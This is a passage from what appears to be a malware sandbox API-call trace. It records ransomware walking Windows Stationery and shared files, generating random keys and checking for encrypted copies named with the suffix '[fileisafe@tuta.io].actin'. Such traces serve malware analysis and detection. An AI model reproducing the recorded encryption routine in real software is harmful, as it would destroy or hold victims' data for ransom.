(normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.722] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.722] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.722] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.722] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=237) returned 1 [0147.723] CloseHandle (hObject=0x2ec) returned 1 [0147.723] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0x20 [0147.723] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.723] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.723] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.723] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.727] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=6406) returned 1 [0147.727] CloseHandle (hObject=0x2ec) returned 1 [0147.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0x20 [0147.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.727] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.728] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=235) returned 1 [0147.728] CloseHandle (hObject=0x2ec) returned 1 [0147.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0x20 [0147.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.728] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.729] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=4222) returned 1 [0147.729] CloseHandle (hObject=0x2ec) returned 1 [0147.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0x20 [0147.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.729] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.729] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.729] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.730] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=237) returned 1 [0147.730] CloseHandle (hObject=0x2ec) returned 1 [0147.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm")) returned 0x20 [0147.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.730] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.731] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=6381) returned 1 [0147.731] CloseHandle (hObject=0x2ec) returned 1 [0147.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg")) returned 0x20 [0147.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.732] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.732] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.732] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=232) returned 1 [0147.732] CloseHandle (hObject=0x2ec) returned 1 [0147.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm")) returned 0x20 [0147.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.732] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.732] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.732] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.733] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=5115) returned 1 [0147.733] CloseHandle (hObject=0x2ec) returned 1 [0147.733] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg")) returned 0x20 [0147.733] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.733] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.733] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.734] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.734] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=233) returned 1 [0147.734] CloseHandle (hObject=0x2ec) returned 1 [0147.734] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm")) returned 0x20 [0147.734] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.735] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.735] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.735] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.735] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1920) returned 1 [0147.735] CloseHandle (hObject=0x2ec) returned 1 [0147.736] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg")) returned 0x20 [0147.736] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.736] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.736] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.736] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.737] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=237) returned 1 [0147.737] CloseHandle (hObject=0x2ec) returned 1 [0147.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm")) returned 0x20 [0147.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.737] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.738] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=4734) returned 1 [0147.738] CloseHandle (hObject=0x2ec) returned 1 [0147.738] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg")) returned 0x20 [0147.738] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.738] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.738] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.738] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.738] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=232) returned 1 [0147.738] CloseHandle (hObject=0x2ec) returned 1 [0147.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm")) returned 0x20 [0147.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.739] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.739] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.739] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.740] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10569) returned 1 [0147.740] CloseHandle (hObject=0x2ec) returned 1 [0147.740] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg")) returned 0x20 [0147.740] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.740] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.740] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.740] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.741] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=230) returned 1 [0147.741] CloseHandle (hObject=0x2ec) returned 1 [0147.741] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm")) returned 0x20 [0147.741] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.741] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0147.983] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=7505) returned 1 [0147.983] CloseHandle (hObject=0x2f8) returned 1 [0147.983] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg")) returned 0x20 [0147.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.984] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0147.985] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=855376) returned 1 [0147.985] CloseHandle (hObject=0x2f8) returned 1 [0147.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll")) returned 0x20 [0147.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0147.985] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0147.985] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, 